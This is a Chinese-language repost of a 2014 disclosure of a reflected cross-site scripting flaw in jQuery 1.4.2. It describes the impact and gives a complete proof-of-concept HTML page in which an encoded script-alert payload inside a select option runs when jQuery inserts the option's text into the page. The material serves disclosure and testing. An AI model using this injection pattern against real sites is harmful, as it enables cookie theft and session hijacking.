中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

JQuery 1.4.2 'index.html'跨站腳本漏洞

發布時間:2020-10-03 14:31:53 來源:網絡 閱讀:2572 作者:zhpfxl 欄目:web開發

XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side


影響版本:

    JQuery-1.4.2

危害:

    JQuery 'index.html'不正確過濾用戶提交的輸入,遠程***者可以利用漏洞構建惡意URI,誘使用戶解析,可獲得敏感Cookie,劫持會話或在客戶端上進行惡意操作。
 

測試:

啟動nginx,并創建文件jquery-xss-reflected.com.br.html,內容為:

<!DOCTYPE html>

<! -- Mauro Risonho de Paula Assumpcao -->

<! -- aka firebits mauro.risonho () gmail com -->

<! -- Exploit jQuery JavaScript Library v1.4.2 -->

<! -- 01.09.2014 18:07:14 SaoPaulo/Brazil                            -->

<! --   _____.__              ___.   .__  __

-->

<! -- _/ ____\__|______   ____\_ |__ |__|/  |_  ______                -->

<! -- \   __\|  \_  __ \_/ __ \| __ \|  \   __\/  ___/                -->

<! -- |  |  |  ||  | \/\  ___/| \_\ \  ||  |  \___ \                 -->

<! -- |__|  |__||__|    \___  |___  /__||__| /____  |                -->

<! --                        \/    \/             \/                 -->

<! -- bits on fire - 1989-2014 - brazil                             -->

<! --                                                                 -->

<! -- * jQuery JavaScript Library v1.4.2                            -->

<! -- * http://jquery.com/                                            -->

<! -- *                                                                -->

<! -- * Copyright 2010, John Resig                                    -->

<! -- * Dual licensed under the MIT or GPL Version 2 licenses.        -->

<! -- * http://jquery.org/license                                    -->

<! -- *                                                                -->

<! -- * Includes Sizzle.js                                            -->

<! -- * http://sizzlejs.com/                                        -->

<! -- * Copyright 2010, The Dojo Foundation

-->

<! -- * Released under the MIT, BSD, and GPL Licenses.                -->

<! -- *                                                                -->

<! -- * Date: Sat Feb 13 22:33:48 2010 -0500                        -->

<! -- */                                                            -->


<html>

<head>

  <meta charset="utf-8">

  <title>XSS Reflected - Jquery 1.4.2 </title>

  <script src="https://code.jquery.com/jquery-1.4.2.js"></script>

  <script>

    $(function() {

      $('#users').each(function() {

        var select = $(this);

        var option = select.children('option').first();

        select.after(option.text());

        select.hide();

      });

    });

  </script>

</head>



<body>

  <form method="post">

    <p>

      <select id="users" name="users">

        <option value="x***eflected">&lt;script&gt;alert(&#x27;x***eflected - jquery 1.4.2 by - 01.09.2014 18:07:14 Sao Paulo/Brazil@firebitsbr - mauro.risonho () gmail com&#x27;);&lt;/script&gt;</option>

      </select>

    </p>

  </form>

</body>

</html>

訪問地址:

http://localhost/jquery-xss-reflected.com.br.html

測試截圖:

JQuery 1.4.2 'index.html'跨站腳本漏洞


相關連接地址:

http://seclists.org/fulldisclosure/2014/Sep/10

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

吉水县| 阿鲁科尔沁旗| 肇州县| 巨鹿县| 裕民县| 阿合奇县| 莎车县| 宝丰县| 平原县| 竹北市| 襄城县| 皋兰县| 雷州市| 滦南县| 日照市| 浪卡子县| 泗阳县| 溆浦县| 南江县| 定西市| 鄯善县| 元氏县| 调兵山市| 中山市| 绩溪县| 宁波市| 阿拉善盟| 泰来县| 淮北市| 赤峰市| 融水| 楚雄市| 广昌县| 乌拉特中旗| 大洼县| 棋牌| 贞丰县| 玉环县| 阳山县| 和田县| 仙桃市|